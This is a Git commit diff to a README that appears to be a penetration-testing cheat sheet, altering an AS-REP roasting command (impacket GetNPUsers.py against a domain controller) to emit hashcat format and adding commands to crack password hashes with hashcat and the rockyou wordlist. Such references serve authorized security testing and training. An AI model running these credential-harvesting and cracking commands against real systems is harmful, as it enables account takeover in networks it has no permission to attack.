Update README.md

This commit is contained in:
Joe Totes
2022-09-05 12:02:35 -04:00
committed by GitHub
parent c1c437ce65
commit b0bb2b46bf

View File

@@ -607,7 +607,7 @@ upload {FILE.exe}
```bash
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip {IP ADDRESS} -request '{DC.NAME}/'
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip {IP ADDRESS} -request '{DC.NAME}/' -format hashcat
```
@@ -1182,6 +1182,21 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
***
#### Hashcat
<br />
```bash
# Search hash numbers
hashcat --example-hashes | less
/hash
# Crack Hash
hashcat -m {HASH NUMBER} {HASH} /usr/share/wordlists/rockyou.txt -O --force
```
#### John The Ripper
<br />